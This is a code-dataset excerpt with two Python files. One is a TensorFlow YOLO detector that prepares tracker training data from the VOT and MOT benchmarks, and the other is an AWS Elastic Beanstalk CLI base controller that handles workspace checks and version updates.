self.conv_3 = self.conv_layer(3,self.pool_2,192,3,1)
self.pool_4 = self.pooling_layer(4,self.conv_3,2,2)
self.conv_5 = self.conv_layer(5,self.pool_4,128,1,1)
self.conv_6 = self.conv_layer(6,self.conv_5,256,3,1)
self.conv_7 = self.conv_layer(7,self.conv_6,256,1,1)
self.conv_8 = self.conv_layer(8,self.conv_7,512,3,1)
self.pool_9 = self.pooling_layer(9,self.conv_8,2,2)
self.conv_10 = self.conv_layer(10,self.pool_9,256,1,1)
self.conv_11 = self.conv_layer(11,self.conv_10,512,3,1)
self.conv_12 = self.conv_layer(12,self.conv_11,256,1,1)
self.conv_13 = self.conv_layer(13,self.conv_12,512,3,1)
self.conv_14 = self.conv_layer(14,self.conv_13,256,1,1)
self.conv_15 = self.conv_layer(15,self.conv_14,512,3,1)
self.conv_16 = self.conv_layer(16,self.conv_15,256,1,1)
self.conv_17 = self.conv_layer(17,self.conv_16,512,3,1)
self.conv_18 = self.conv_layer(18,self.conv_17,512,1,1)
self.conv_19 = self.conv_layer(19,self.conv_18,1024,3,1)
self.pool_20 = self.pooling_layer(20,self.conv_19,2,2)
self.conv_21 = self.conv_layer(21,self.pool_20,512,1,1)
self.conv_22 = self.conv_layer(22,self.conv_21,1024,3,1)
self.conv_23 = self.conv_layer(23,self.conv_22,512,1,1)
self.conv_24 = self.conv_layer(24,self.conv_23,1024,3,1)
self.conv_25 = self.conv_layer(25,self.conv_24,1024,3,1)
self.conv_26 = self.conv_layer(26,self.conv_25,1024,3,2)
self.conv_27 = self.conv_layer(27,self.conv_26,1024,3,1)
self.conv_28 = self.conv_layer(28,self.conv_27,1024,3,1)
self.fc_29 = self.fc_layer(29,self.conv_28,512,flat=True,linear=False)
self.fc_30 = self.fc_layer(30,self.fc_29,4096,flat=False,linear=False)
#skip dropout_31
self.fc_32 = self.fc_layer(32,self.fc_30,1470,flat=False,linear=True)
self.sess = tf.Session()
self.sess.run(tf.initialize_all_variables())
self.saver = tf.train.Saver()
self.saver.restore(self.sess,self.weights_file)
if self.disp_console : print "Loading complete!" + '\n'
def conv_layer(self,idx,inputs,filters,size,stride):
channels = inputs.get_shape()[3]
weight = tf.Variable(tf.truncated_normal([size,size,int(channels),filters], stddev=0.1))
biases = tf.Variable(tf.constant(0.1, shape=[filters]))
pad_size = size//2
pad_mat = np.array([[0,0],[pad_size,pad_size],[pad_size,pad_size],[0,0]])
inputs_pad = tf.pad(inputs,pad_mat)
conv = tf.nn.conv2d(inputs_pad, weight, strides=[1, stride, stride, 1], padding='VALID',name=str(idx)+'_conv')
conv_biased = tf.add(conv,biases,name=str(idx)+'_conv_biased')
if self.disp_console : print ' Layer %d : Type = Conv, Size = %d * %d, Stride = %d, Filters = %d, Input channels = %d' % (idx,size,size,stride,filters,int(channels))
return tf.maximum(self.alpha*conv_biased,conv_biased,name=str(idx)+'_leaky_relu')
def pooling_layer(self,idx,inputs,size,stride):
if self.disp_console : print ' Layer %d : Type = Pool, Size = %d * %d, Stride = %d' % (idx,size,size,stride)
return tf.nn.max_pool(inputs, ksize=[1, size, size, 1],strides=[1, stride, stride, 1], padding='SAME',name=str(idx)+'_pool')
def fc_layer(self,idx,inputs,hiddens,flat = False,linear = False):
input_shape = inputs.get_shape().as_list()
if flat:
dim = input_shape[1]*input_shape[2]*input_shape[3]
inputs_transposed = tf.transpose(inputs,(0,3,1,2))
inputs_processed = tf.reshape(inputs_transposed, [-1,dim])
else:
dim = input_shape[1]
inputs_processed = inputs
weight = tf.Variable(tf.truncated_normal([dim,hiddens], stddev=0.1))
biases = tf.Variable(tf.constant(0.1, shape=[hiddens]))
if self.disp_console : print ' Layer %d : Type = Full, Hidden = %d, Input dimension = %d, Flat = %d, Activation = %d' % (idx,hiddens,int(dim),int(flat),1-int(linear))
if linear : return tf.add(tf.matmul(inputs_processed,weight),biases,name=str(idx)+'_fc')
ip = tf.add(tf.matmul(inputs_processed,weight),biases)
return tf.maximum(self.alpha*ip,ip,name=str(idx)+'_fc')
def detect_from_cvmat(self,img):
s = time.time()
self.h_img,self.w_img,_ = img.shape
img_resized = cv2.resize(img, (448, 448))
img_RGB = cv2.cvtColor(img_resized,cv2.COLOR_BGR2RGB)
img_resized_np = np.asarray( img_RGB )
inputs = np.zeros((1,448,448,3),dtype='float32')
inputs[0] = (img_resized_np/255.0)*2.0-1.0
in_dict = {self.x: inputs}
net_output = self.sess.run(self.fc_32,feed_dict=in_dict)
self.result = self.interpret_output(net_output[0])
self.show_results(img,self.result)
strtime = str(time.time()-s)
if self.disp_console : print 'Elapsed time : ' + strtime + ' secs' + '\n'
def detect_from_file(self,filename):
if self.disp_console : print 'Detect from ' + filename
img = cv2.imread(filename)
#img = misc.imread(filename)
self.detect_from_cvmat(img)
def detect_from_crop_sample(self):
self.w_img = 640
self.h_img = 420
f = np.array(open('person_crop.txt','r').readlines(),dtype='float32')
inputs = np.zeros((1,448,448,3),dtype='float32')
for c in range(3):
for y in range(448):
for x in range(448):
inputs[0,y,x,c] = f[c*448*448+y*448+x]
in_dict = {self.x: inputs}
net_output = self.sess.run(self.fc_32,feed_dict=in_dict)
self.boxes, self.probs = self.interpret_output(net_output[0])
img = cv2.imread('person.jpg')
self.show_results(self.boxes,img)
def interpret_output(self,output):
probs = np.zeros((7,7,2,20))
class_probs = np.reshape(output[0:980],(7,7,20))
scales = np.reshape(output[980:1078],(7,7,2))
boxes = np.reshape(output[1078:],(7,7,2,4))
offset = np.transpose(np.reshape(np.array([np.arange(7)]*14),(2,7,7)),(1,2,0))
boxes[:,:,:,0] += offset
boxes[:,:,:,1] += np.transpose(offset,(1,0,2))
boxes[:,:,:,0:2] = boxes[:,:,:,0:2] / 7.0
boxes[:,:,:,2] = np.multiply(boxes[:,:,:,2],boxes[:,:,:,2])
boxes[:,:,:,3] = np.multiply(boxes[:,:,:,3],boxes[:,:,:,3])
boxes[:,:,:,0] *= self.w_img
boxes[:,:,:,1] *= self.h_img
boxes[:,:,:,2] *= self.w_img
boxes[:,:,:,3] *= self.h_img
for i in range(2):
for j in range(20):
probs[:,:,i,j] = np.multiply(class_probs[:,:,j],scales[:,:,i])
filter_mat_probs = np.array(probs>=self.threshold,dtype='bool')
filter_mat_boxes = np.nonzero(filter_mat_probs)
boxes_filtered = boxes[filter_mat_boxes[0],filter_mat_boxes[1],filter_mat_boxes[2]]
probs_filtered = probs[filter_mat_probs]
classes_num_filtered = np.argmax(filter_mat_probs,axis=3)[filter_mat_boxes[0],filter_mat_boxes[1],filter_mat_boxes[2]]
argsort = np.array(np.argsort(probs_filtered))[::-1]
boxes_filtered = boxes_filtered[argsort]
probs_filtered = probs_filtered[argsort]
classes_num_filtered = classes_num_filtered[argsort]
for i in range(len(boxes_filtered)):
if probs_filtered[i] == 0 : continue
for j in range(i+1,len(boxes_filtered)):
if self.iou(boxes_filtered[i],boxes_filtered[j]) > self.iou_threshold :
probs_filtered[j] = 0.0
filter_iou = np.array(probs_filtered>0.0,dtype='bool')
boxes_filtered = boxes_filtered[filter_iou]
probs_filtered = probs_filtered[filter_iou]
classes_num_filtered = classes_num_filtered[filter_iou]
result = []
for i in range(len(boxes_filtered)):
result.append([self.classes[classes_num_filtered[i]],boxes_filtered[i][0],boxes_filtered[i][1],boxes_filtered[i][2],boxes_filtered[i][3],probs_filtered[i]])
return result
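# Note (not part of the original file): layout of the 1470-dim YOLO_small output
# decoded above, for a 7x7 grid with 2 boxes per cell and 20 classes:
#   [0    : 980 ]  class probabilities, 7*7*20
#   [980  : 1078]  box confidences,     7*7*2
#   [1078 : 1470]  box geometry,        7*7*2*4  (x, y, sqrt(w), sqrt(h))
# The x/y offsets are cell-relative (hence the `offset` grid), and w/h are stored
# as square roots, which is why they are squared before scaling to image size.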
def show_results(self,img,results):
img_cp = img.copy()
if self.filewrite_txt :
ftxt = open(self.tofile_txt,'w')
for i in range(len(results)):
x = int(results[i][1])
y = int(results[i][2])
w = int(results[i][3])//2
h = int(results[i][4])//2
if self.disp_console : print ' class : ' + results[i][0] + ' , [x,y,w,h]=[' + str(x) + ',' + str(y) + ',' + str(int(results[i][3])) + ',' + str(int(results[i][4]))+'], Confidence = ' + str(results[i][5])
if self.filewrite_img or self.imshow:
cv2.rectangle(img_cp,(x-w,y-h),(x+w,y+h),(0,255,0),2)
cv2.rectangle(img_cp,(x-w,y-h-20),(x+w,y-h),(125,125,125),-1)
cv2.putText(img_cp,results[i][0] + ' : %.2f' % results[i][5],(x-w+5,y-h-7),cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,0,0),1)
if self.filewrite_txt :
ftxt.write(results[i][0] + ',' + str(x) + ',' + str(y) + ',' + str(w) + ',' + str(h)+',' + str(results[i][5]) + '\n')
if self.filewrite_img :
if self.disp_console : print ' image file writed : ' + self.tofile_img
cv2.imwrite(self.tofile_img,img_cp)
if self.imshow :
cv2.imshow('YOLO_small detection',img_cp)
cv2.waitKey(0)
if self.filewrite_txt :
if self.disp_console : print ' txt file writed : ' + self.tofile_txt
ftxt.close()
def iou(self,box1,box2):
tb = min(box1[0]+0.5*box1[2],box2[0]+0.5*box2[2])-max(box1[0]-0.5*box1[2],box2[0]-0.5*box2[2])
lr = min(box1[1]+0.5*box1[3],box2[1]+0.5*box2[3])-max(box1[1]-0.5*box1[3],box2[1]-0.5*box2[3])
if tb < 0 or lr < 0 : intersection = 0
else : intersection = tb*lr
return intersection / (box1[2]*box1[3] + box2[2]*box2[3] - intersection)
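# Worked example (not part of the original file): for boxes given as
# (x_center, y_center, w, h), box1 = (10, 10, 10, 10) and box2 = (15, 10, 10, 10)
# overlap in a 5x10 region, so
#   iou = 50 / (100 + 100 - 50) = 1/3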
# my addition
def createFolder(self, path):
if not os.path.exists(path):
os.makedirs(path)
def debug_location(self, img, location):
img_cp = img.copy()
x = int(location[1])
y = int(location[2])
w = int(location[3])//2
h = int(location[4])//2
cv2.rectangle(img_cp,(x-w,y-h),(x+w,y+h),(0,255,0),2)
cv2.rectangle(img_cp,(x-w,y-h-20),(x+w,y-h),(125,125,125),-1)
cv2.putText(img_cp, str(location[0]) + ' : %.2f' % location[5],(x-w+5,y-h-7),cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,0,0),1)
cv2.imshow('YOLO_small detection',img_cp)
cv2.waitKey(1)
def debug_locations(self, img, locations):
img_cp = img.copy()
for location in locations:
x = int(location[1])
y = int(location[2])
w = int(location[3])//2
h = int(location[4])//2
cv2.rectangle(img_cp,(x-w,y-h),(x+w,y+h),(0,255,0),2)
cv2.rectangle(img_cp,(x-w,y-h-20),(x+w,y-h),(125,125,125),-1)
cv2.putText(img_cp, str(location[0]) + ' : %.2f' % location[5],(x-w+5,y-h-7),cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,0,0),1)
cv2.imshow('YOLO_small detection',img_cp)
cv2.waitKey(1)
def debug_gt_location(self, img, location):
img_cp = img.copy()
x = int(location[0])
y = int(location[1])
w = int(location[2])
h = int(location[3])
cv2.rectangle(img_cp,(x,y),(x+w,y+h),(0,255,0),2)
cv2.imshow('gt',img_cp)
cv2.waitKey(1)
def file_to_img(self, filepath):
img = cv2.imread(filepath)
return img
def file_to_video(self, filepath):
try:
video = cv2.VideoCapture(filepath)
except IOError:
print 'cannot open video file: ' + filepath
else:
print 'opened video file: ' + filepath
return video
def iou(self,box1,box2):
tb = min(box1[0]+0.5*box1[2],box2[0]+0.5*box2[2])-max(box1[0]-0.5*box1[2],box2[0]-0.5*box2[2])
lr = min(box1[1]+0.5*box1[3],box2[1]+0.5*box2[3])-max(box1[1]-0.5*box1[3],box2[1]-0.5*box2[3])
if tb < 0 or lr < 0 : intersection = 0
else : intersection = tb*lr
return intersection / (box1[2]*box1[3] + box2[2]*box2[3] - intersection)
def find_iou_cost(self, pred_locs, gts):
# for each element in the batch, find its iou. output a list of ious.
cost = 0
batch_size= len(pred_locs)
assert (len(gts)== batch_size)
print("batch_size: ")
ious = []
for i in range(batch_size):
pred_loc = pred_locs[i]
gt = gts[i]
iou_ = self.iou(pred_loc, gt)
ious.append(iou_)
return ious
def load_folder(self, path):
paths = [os.path.join(path,fn) for fn in next(os.walk(path))[2]]
#return paths
return sorted(paths)
def load_dataset_gt(self, gt_file):
txtfile = open(gt_file, "r")
lines = txtfile.read().split('\n') #'\r\n'
return lines
def find_gt_location(self, lines, id):
line = lines[id]
elems = line.split('\t') # for gt type 2
if len(elems) < 4:
elems = line.split(',') #for gt type 1
x1 = elems[0]
y1 = elems[1]
w = elems[2]
h = elems[3]
gt_location = [int(x1), int(y1), int(w), int(h)]
return gt_location
def find_best_location(self, locations, gt_location):
# locations (class, x, y, w, h, prob); (x, y) is the middle pt of the rect
# gt_location (x1, y1, w, h)
x1 = gt_location[0]
y1 = gt_location[1]
w = gt_location[2]
h = gt_location[3]
gt_location_revised= [x1 + w/2, y1 + h/2, w, h]
max_ious= 0
for id, location in enumerate(locations):
location_revised = location[1:5]
print("location: ", location_revised)
print("gt_location: ", gt_location_revised)
ious = self.iou(location_revised, gt_location_revised)
if ious >= max_ious:
max_ious = ious
index = id
print("Max IOU: " + str(max_ious))
if max_ious != 0:
best_location = locations[index]
class_index = self.classes.index(best_location[0])
best_location[0]= class_index
return best_location
else: # it means the detection failed, no intersection with the ground truth
return [0, 0, 0, 0, 0, 0]
def save_yolo_output(self, out_fold, yolo_output, filename):
name_no_ext= os.path.splitext(filename)[0]
output_name= name_no_ext
path = os.path.join(out_fold, output_name)
np.save(path, yolo_output)
def location_from_0_to_1(self, wid, ht, location):
location[1] /= wid
location[2] /= ht
location[3] /= wid
location[4] /= ht
return location
def gt_location_from_0_to_1(self, wid, ht, location):
wid *= 1.0
ht *= 1.0
location[0] /= wid
location[1] /= ht
location[2] /= wid
location[3] /= ht
return location
def locations_normal(self, wid, ht, locations):
wid *= 1.0
ht *= 1.0
locations[1] *= wid
locations[2] *= ht
locations[3] *= wid
locations[4] *= ht
return locations
def cal_yolo_loss(self, location, gt_location):
# Translate yolo's box mid-point (x0, y0) to top-left point (x1, y1), in order to compare with gt
location[0] = location[0] - location[2]/2
location[1] = location[1] - location[3]/2
loss= sum([(location[i] - gt_location[i])**2 for i in range(4)]) * 100 / 4
return loss
def cal_yolo_IOU(self, location, gt_location):
# Translate yolo's box mid-point (x0, y0) to top-left point (x1, y1), in order to compare with gt
location[0] = location[0] - location[2]/2
location[1] = location[1] - location[3]/2
loss = self.iou(location, gt_location)
return loss
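    # Note: both cal_yolo_loss() and cal_yolo_IOU() first shift YOLO's box center (x0, y0) to the
    # top-left corner so the box matches the ground-truth (x1, y1, w, h) convention. cal_yolo_loss()
    # returns 100 times the mean squared error over the four coordinates (the 100/4 factor), while
    # cal_yolo_IOU() simply reuses iou() on the shifted box.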
def prepare_training_data(self, img_fold, gt_file, out_fold): #[or]prepare_training_data(self, list_file, gt_file, out_fold):
        ''' Pass the data through YOLO: take the fc_30 activations as features and the fc_32 output as locations.
        Save the features and locations into a file for training the LSTM. '''
# Reshape the input image
paths= self.load_folder(img_fold)
gt_locations= self.load_dataset_gt(gt_file)
avg_loss = 0
total= 0
total_time= 0
for id, path in enumerate(paths):
filename= os.path.basename(path)
print("processing: ", id, ": ", filename)
img = self.file_to_img(path)
# Pass through YOLO layers
self.h_img,self.w_img,_ = img.shape
img_resized = cv2.resize(img, (448, 448))
img_RGB = cv2.cvtColor(img_resized,cv2.COLOR_BGR2RGB)
img_resized_np = np.asarray( img_RGB )
inputs = np.zeros((1,448,448,3),dtype='float32')
inputs[0] = (img_resized_np/255.0)*2.0-1.0
in_dict = {self.x : inputs}
start_time = time.time()
feature= self.sess.run(self.fc_30,feed_dict=in_dict)
cycle_time = time.time() - start_time
print('cycle time= ', cycle_time)
total_time += cycle_time
output = self.sess.run(self.fc_32,feed_dict=in_dict) # make sure it does not run conv layers twice
locations = self.interpret_output(output[0])
gt_location = self.find_gt_location(gt_locations, id)
location = self.find_best_location(locations, gt_location) # find the ROI that has the maximum IOU with the ground truth
self.debug_location(img, location)
self.debug_gt_location(img, gt_location)
# change location into [0, 1]
loss= self.cal_yolo_IOU(location[1:5], gt_location)
location = self.location_from_0_to_1(self.w_img, self.h_img, location)
avg_loss += loss
total += 1
print("loss: ", loss)
yolo_output= np.concatenate(
( np.reshape(feature, [-1, self.num_feat]),
np.reshape(location, [-1, self.num_predict]) ),
axis = 1)
self.save_yolo_output(out_fold, yolo_output, filename)
avg_loss = avg_loss/total
print("YOLO avg_loss: ", avg_loss)
print "Time Spent on Tracking: " + str(total_time)
print "fps: " + str(id/total_time)
return
def loc_to_coordinates(self, loc):
loc = [i * 32 for i in loc]
x1= int(loc[0]- loc[2]/2)
y1= int(loc[1]- loc[3]/2)
x2= int(loc[0]+ loc[2]/2)
y2= int(loc[1]+ loc[3]/2)
return [x1, y1, x2, y2]
def coordinates_to_heatmap_vec(self, coord):
heatmap_vec = np.zeros(1024)
print(coord)
[classnum, x1, y1, x2, y2, prob] = coord
[x1, y1, x2, y2]= self.loc_to_coordinates([x1, y1, x2, y2])
for y in range(y1, y2):
for x in range(x1, x2):
index = y*32 + x
heatmap_vec[index] = 1.0
return heatmap_vec
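    # Note: coordinates_to_heatmap_vec() rasterizes one box onto a flattened 32x32 grid
    # (1024 = 32 * 32), which is why loc_to_coordinates() multiplies the normalized [0, 1]
    # coordinates by 32. A minimal usage sketch (assumed, mirroring the call in
    # prepare_training_data_heatmap below):
    #   loc = [class_id, 0.5, 0.5, 0.25, 0.25, prob]   # normalized (x, y, w, h) box
    #   vec = self.coordinates_to_heatmap_vec(loc)     # 1024-dim 0/1 mask
    #   heatmap = np.reshape(vec, (32, 32))            # grid cells covered by the box are 1.0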
def prepare_training_data_heatmap(self, img_fold, gt_file, out_fold): #[or]prepare_training_data(self, list_file, gt_file, out_fold):
        ''' Pass the data through YOLO: take the fc_30 activations as features and the fc_32 output as locations.
        Convert each location into a heatmap vector and save it with the features for training the LSTM. '''
# Reshape the input image
paths= self.load_folder(img_fold)
gt_locations= self.load_dataset_gt(gt_file)
avg_loss = 0
total= 0
for id, path in enumerate(paths):
filename= os.path.basename(path)
print("processing: ", id, ": ", filename)
img = self.file_to_img(path)
# Pass through YOLO layers
self.h_img,self.w_img,_ = img.shape
img_resized = cv2.resize(img, (448, 448))
img_RGB = cv2.cvtColor(img_resized,cv2.COLOR_BGR2RGB)
img_resized_np = np.asarray( img_RGB )
inputs = np.zeros((1,448,448,3),dtype='float32')
inputs[0] = (img_resized_np/255.0)*2.0-1.0
in_dict = {self.x : inputs}
            # Fetch features and detections in a single run so the conv layers are evaluated only once
            feature, output = self.sess.run([self.fc_30, self.fc_32], feed_dict=in_dict)
locations = self.interpret_output(output[0])
gt_location = self.find_gt_location(gt_locations, id)
location = self.find_best_location(locations, gt_location) # find the ROI that has the maximum IOU with the ground truth
self.debug_location(img, location)
self.debug_gt_location(img, gt_location)
# change location into [0, 1]
loss= self.cal_yolo_IOU(location[1:5], gt_location)
location = self.location_from_0_to_1(self.w_img, self.h_img, location)
heatmap_vec= self.coordinates_to_heatmap_vec(location)
avg_loss += loss
total += 1
print("loss: ", loss)
yolo_output= np.concatenate(
( np.reshape(feature, [-1, self.num_feat]),
np.reshape(heatmap_vec, [-1, self.num_heatmap]) ),
axis = 1)
self.save_yolo_output(out_fold, yolo_output, filename)
avg_loss = avg_loss/total
print("YOLO avg_loss: ", avg_loss)
return
def prepare_training_data_multiTarget(self, img_fold, out_fold):
        ''' Pass the data through YOLO: take the fc_30 activations as features and the fc_32 output as locations.
        Save the features and all detected locations into a file for training the LSTM. '''
# Reshape the input image
print(img_fold)
paths= self.load_folder(img_fold)
avg_loss = 0
total= 0
for id, path in enumerate(paths):
filename= os.path.basename(path)
print("processing: ", id, ": ", filename)
img = self.file_to_img(path)
# Pass through YOLO layers
self.h_img,self.w_img,_ = img.shape
img_resized = cv2.resize(img, (448, 448))
img_RGB = cv2.cvtColor(img_resized,cv2.COLOR_BGR2RGB)
img_resized_np = np.asarray( img_RGB )
inputs = np.zeros((1,448,448,3),dtype='float32')
inputs[0] = (img_resized_np/255.0)*2.0-1.0
in_dict = {self.x : inputs}
            # Fetch features and detections in a single run so the conv layers are evaluated only once
            feature, output = self.sess.run([self.fc_30, self.fc_32], feed_dict=in_dict)
locations = self.interpret_output(output[0])
self.debug_locations(img, locations)
# change location into [0, 1]
for i in range(0, len(locations)):
class_index = self.classes.index(locations[i][0])
locations[i][0] = class_index
locations[i] = self.location_from_0_to_1(self.w_img, self.h_img, locations[i])
if len(locations)== 1:
print('len(locations)= 1\n')
yolo_output = [[np.reshape(feature, [-1, self.num_feat])], [np.reshape(locations, [-1, self.num_predict]), [0,0,0,0,0,0]]]
else:
yolo_output = [[np.reshape(feature, [-1, self.num_feat])], [np.reshape(locations, [-1, self.num_predict])]]
self.save_yolo_output(out_fold, yolo_output, filename)
return
'''----------------------------------------main-----------------------------------------------------'''
def main(argvs):
yolo = YOLO_TF(argvs)
test = 4
    heatmap = False  # set to True to generate heatmap training data instead of location vectors
'''
VOT30
0:'Human2'
1:'Human9'
2:'Gym'
3:'Human8'
4:'Skater'
5:'Suv'
6:'BlurBody'
7:'CarScale'
8:'Dancer2'
9:'BlurCar1'
10:'Dog'
11:'Jump'
12:'Singer2'
13:'Woman'
14:'David3'
15:'Dancer'
16:'Human7'
17:'Bird1'
18:'Car4'
19:'CarDark'
20:'Couple'
21:'Diving'
22:'Human3'
23:'Skating1'
24:'Human6'
25:'Singer1'
26:'Skater2'
27:'Walking2'
28:'BlurCar3'
29:'Girl2'
MOT2016
30:'MOT16-02'
31:'MOT16-04'
32:'MOT16-05'
33:'MOT16-09'
34:'MOT16-10'
35:'MOT16-11'
36:'MOT16-13'
37:'MOT16-01'
38:'MOT16-03'
39:'MOT16-06'
40:'MOT16-07'
41:'MOT16-08'
42:'MOT16-12'
43:'MOT16-14'
'''
[yolo.w_img, yolo.h_img, sequence_name, dummy_1, dummy_2]= util.choose_video_sequence(test)
if (test >= 0 and test <= 29) or (test >= 90):
root_folder = 'benchmark/DATA'
img_fold = os.path.join(root_folder, sequence_name, 'img/')
elif test<= 36:
root_folder = 'benchmark/MOT/MOT2016/train'
img_fold = os.path.join(root_folder, sequence_name, 'img1/')
elif test<= 43:
root_folder = 'benchmark/MOT/MOT2016/test'
img_fold = os.path.join(root_folder, sequence_name, 'img1/')
gt_file = os.path.join(root_folder, sequence_name, 'groundtruth_rect.txt')
out_fold = os.path.join(root_folder, sequence_name, 'yolo_out/')
heat_fold = os.path.join(root_folder, sequence_name, 'yolo_heat/')
yolo.createFolder(out_fold)
yolo.createFolder(heat_fold)
if heatmap is True:
yolo.prepare_training_data_heatmap(img_fold, gt_file, heat_fold)
else:
if (test >= 0 and test <= 29) or (test >= 90):
yolo.prepare_training_data(img_fold,gt_file,out_fold)
else:
yolo.prepare_training_data_multiTarget(img_fold,out_fold)
if __name__=='__main__':
main(sys.argv)
|
ebcli/core/abstractcontroller.py | senstb/aws-elastic-beanstalk-cli | 110 | 17250 | # Copyright 2014 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import textwrap
import json
import sys
import os
from cement.core import controller
from ebcli import __version__
from ebcli.core.ebglobals import Constants
from ebcli.lib import elasticbeanstalk, utils
from ebcli.core import io, fileoperations
from ebcli.objects.exceptions import (
NoEnvironmentForBranchError,
PlatformWorkspaceNotSupportedError,
ApplicationWorkspaceNotSupportedError,
EBCLIException,
NotInitializedError
)
from ebcli.resources.strings import strings, flag_text
from ebcli.objects import region
from ebcli.operations import commonops
class AbstractBaseController(controller.CementBaseController):
"""
This is an abstract base class that is useless on its own, but used
by other classes to sub-class from and to share common commands and
arguments.
"""
class Meta:
label = 'abstract'
stacked_on = 'base'
stacked_type = 'nested'
arguments = [
(['environment_name'], dict(action='store', nargs='?',
default=[],
help=flag_text['general.env'])),
]
epilog = ''
usage = 'eb {cmd} <environment_name> [options ...]'
def do_command(self):
pass
@classmethod
def validate_workspace(cls):
workspace_type = fileoperations.get_workspace_type(None)
is_platform_workspace_only_command = cls.Meta.__dict__.get(
'is_platform_workspace_only_command'
)
requires_directory_initialization = cls.Meta.__dict__.get(
'requires_directory_initialization'
)
if '--modules' in sys.argv:
pass
elif '--help' in sys.argv:
pass
elif cls.__name__ == 'PlatformListController' or cls.__name__ == 'EBPListController':
pass
elif requires_directory_initialization and not workspace_type:
raise NotInitializedError(strings['exit.notsetup'])
elif is_platform_workspace_only_command:
if Constants.WorkSpaceTypes.APPLICATION == workspace_type:
raise ApplicationWorkspaceNotSupportedError(
strings['exit.applicationworkspacenotsupported']
)
@controller.expose(hide=True)
def default(self):
"""
This command will be shared within all controllers that sub-class
from here. It can also be overridden in the sub-class
"""
self.validate_workspace()
self.do_command()
self.check_for_cli_update(__version__)
def check_workspace_type(self, expected_type):
workspace_type = fileoperations.get_workspace_type()
if workspace_type != expected_type:
if Constants.WorkSpaceTypes.PLATFORM == workspace_type:
raise PlatformWorkspaceNotSupportedError(
strings['exit.platformworkspacenotsupported']
)
if Constants.WorkSpaceTypes.APPLICATION == workspace_type:
raise ApplicationWorkspaceNotSupportedError(
strings['exit.applicationworkspacenotsupported']
)
def check_for_cli_update(self, version):
label = self.Meta.label
if label in ('create', 'deploy', 'status', 'clone', 'config'):
if cli_update_exists(version):
if self.check_install_script_used():
io.log_alert(strings['base.update_available_script_install'])
else:
io.log_alert(strings['base.update_available'])
def get_app_name(self):
app_name = fileoperations.get_application_name()
return app_name
def get_env_name(self, cmd_example=None, noerror=False, varname='environment_name'):
env_name = getattr(self.app.pargs, varname, None)
if not env_name:
env_name = commonops. \
get_current_branch_environment()
workspace_type = fileoperations.get_workspace_type(Constants.WorkSpaceTypes.APPLICATION)
if not env_name:
if Constants.WorkSpaceTypes.PLATFORM == workspace_type:
raise EBCLIException(strings['platform.nobuilderenv'])
if noerror:
return None
if not cmd_example:
message = strings['branch.noenv'].replace('{cmd}',
self.Meta.label)
else:
message = strings['branch.noenv'].replace('eb {cmd}',
cmd_example)
io.log_error(message)
raise NoEnvironmentForBranchError()
return env_name
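    # Note: get_env_name() resolves the environment in order: the explicit positional argument,
    # then the default environment associated with the current branch; if neither exists it either
    # returns None (when noerror=True) or raises NoEnvironmentForBranchError with a usage hint.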
def check_install_script_used(self):
return '.ebcli-virtual-env' in os.path.abspath(__file__)
@classmethod
def _add_to_handler(cls, handler):
handler.register(cls)
@property
def _help_text(self):
"""
Returns the help text displayed when for the commands of the type `eb <command> <subcommand>`
except where <command> is "platform".
"""
longest = 0
        def pad(label):
            padlength = longest - len(label) + 2
            if padlength < 0:
                return ' ' + ' ' * longest
            return ' ' + ' ' * padlength
help_txt = ''
for label in self._visible_commands:
if len(label) > longest:
longest = len(label)
for label in self._visible_commands:
cmd = self._dispatch_map[label]
cmd_txt = ' '
cmd_name = label
cmd_aliases = cmd['aliases']
if len(cmd_aliases) > 0 and cmd['aliases_only']:
cmd_name = cmd_aliases.pop(0)
cmd_txt += '{}'.format(cmd_name)
if cmd['help']:
cmd_txt += '{}{}'.format(pad(cmd_txt), cmd['help'])
if len(cmd_aliases) > 0:
cmd_txt += '\n{}(alias: {})'.format(pad(''), ', '.join(cmd_aliases))
cmd_txt += '\n'
help_txt += cmd_txt
if len(help_txt) > 0:
txt = '''{}
commands:
{}
'''.format(self._meta.description, help_txt)
else:
txt = self._meta.description
return textwrap.dedent(txt)
def cli_update_exists(current_version):
try:
data = utils.get_data_from_url(
'https://pypi.python.org/pypi/awsebcli/json', timeout=5)
data = json.loads(data)
latest = data['info']['version']
return latest != current_version
except:
return False
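# Note: cli_update_exists() is used by AbstractBaseController.check_for_cli_update() above; the
# bare `except` deliberately treats any network or JSON failure as "no update available" so the
# CLI never fails because of the version check. A hand check might look like (the version string
# below is only an example, not a real pin):
#     cli_update_exists('3.0.0')  # True whenever PyPI reports a different latest version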
|